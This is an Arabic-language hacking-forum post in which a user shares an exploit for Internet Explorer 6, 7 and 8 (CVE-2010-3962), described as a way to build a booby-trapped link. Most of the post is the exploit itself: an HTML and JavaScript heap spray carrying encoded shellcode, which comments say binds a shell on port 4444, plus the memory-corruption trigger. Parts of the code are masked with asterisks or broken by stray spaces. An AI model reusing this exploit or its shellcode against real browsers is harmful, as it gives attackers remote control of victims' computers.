بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

كيفكم اعضاء منتديات جيوش الهكرز

انا جايب لكم ثغره مباشره بمتصفح انترنت اكسبلور 6.7.8

هاذي الثغره تمكن من انشاء رابط ملغم

تفضلوو كود الثغره

------------------------------------------------------
# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962
# Tested on Windows XP SP3 IE6 IE7 IE8# Coded by Matteo Memelli ryujin __at__ offsec.com# ضع رابط الباتش هنا Thx to dookie __at__ offsec.com# notes : This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it <!-- Tested on IE6/IE7/IE8 XPSP3 quick and dirty sploit for CVE-2010-3962 zeroday Note: The EIP value at crash time depends on the exact version of the mshtml library used by IE.This means that the exploit is not universal for the IE versions indicated in the exploit. IE6 on XP SP2: mshtml.dll Version 6.0.2900.5512 EIP: 0x0D7DC9C9IE7 on XP SP3: mshtml.dll Version 7.00.6000.17080 EIP: 0x303CEEBBIE8 on XP SP3: mshtml.dll Version 8.00.6001.18939 EIP: 0x1D3CF5BD Matteo Memelli, ryujin __at__ offsec.com thx to dookie __at__ offsec.com //--><html><head><title>poc CVE-2010-3962 zeroday</title>****************************************func tion alloc(bytes, mystr) {// Bind****************l on port 4444var ****************lcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31 e5%u64d2%u528b%u8b30%u0c52%u528b'+'%u8b14%u2872%ub 70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dc f%uc701%uf0e2%u5752%u528b'+'%u8b10%u3c42%ud001%u40 8b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301 %u3ce3%u8b49%u8b34'+'%ud601%uff31%uc031%uc1ac%u0dc f%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58% u2458%ud301'+'%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04 %ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u 8b5a'+'%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32% u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4'+' %u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%u ea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268'+'%u1100% u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub 768%u38e9%uffff%u53d5%u5753%u7468'+'%u3bec%uffe1%u 57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue3 89%u5757%u3157%u6af6%u5912'+'%ue256%u66fd%u44c7%u3 c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u564 6%u564e%u5356%u6856'+'%ucc79%u863f%ud5ff%ue089%u56 4e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856 %u95a6%u9dbd'+'%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb0 5%u1347%u6f72%u006a%uff53%u41d5');while (mystr.length< bytes) mystr += mystr;return mystr.substr(0, (bytes-6)/2) + ****************lcode;}</script></head><body>*************************************** *********************('ph33r: click me');var evil = new Array();var FAKEOBJ = unescape("%u0d0d%u0d0d");//FAKEOBJ = alloc(233120, FAKEOBJ); // IE6//FAKEOBJ = alloc(733120, FAKEOBJ); // IE7FAKEOBJ = alloc(433120, FAKEOBJ); // IE8for (var k = 0; k < 1000; k++) { evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);}document.write("<table style=position:absolute;clip:rect(0)>");</script> </body>
</html>
-----------------------------------------------------

اخوكم : MR.E3DAM

اتمنا منكم التقيم والردود